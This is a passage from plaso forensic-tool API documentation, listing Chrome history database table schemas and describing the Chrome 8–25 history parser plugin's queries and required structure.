NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER 
NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type 
VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT 
NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type 
VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer 
VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT 
NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY 
KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON 
NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL, mime_type VARCHAR(255) NOT NULL DEFAULT "", original_mime_type VARCHAR(255) NOT NULL DEFAULT "", guid VARCHAR NOT NULL DEFAULT \'\', hash BLOB NOT NULL DEFAULT X\'\', http_method VARCHAR NOT NULL DEFAULT \'\', tab_url VARCHAR NOT NULL DEFAULT \'\', tab_referrer_url VARCHAR NOT NULL DEFAULT \'\', site_url VARCHAR NOT NULL DEFAULT \'\', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 
'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL 
DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT 
NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition 
INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]
class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin
Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
SQLite parser plugin for Google Chrome 8 - 25 history database files.
DATA_FORMAT = 'Google Chrome 8 - 25 history SQLite database file'
NAME = 'chrome_8_history'
ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)
Parses a file downloaded row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT id, full_path, url, start_time, received_bytes, total_bytes FROM downloads', 'ParseFileDownloadedRow')]
REQUIRED_STRUCTURE = {'downloads': frozenset({'full_path', 'id', 'received_bytes', 'start_time', 'total_bytes', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}
SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed 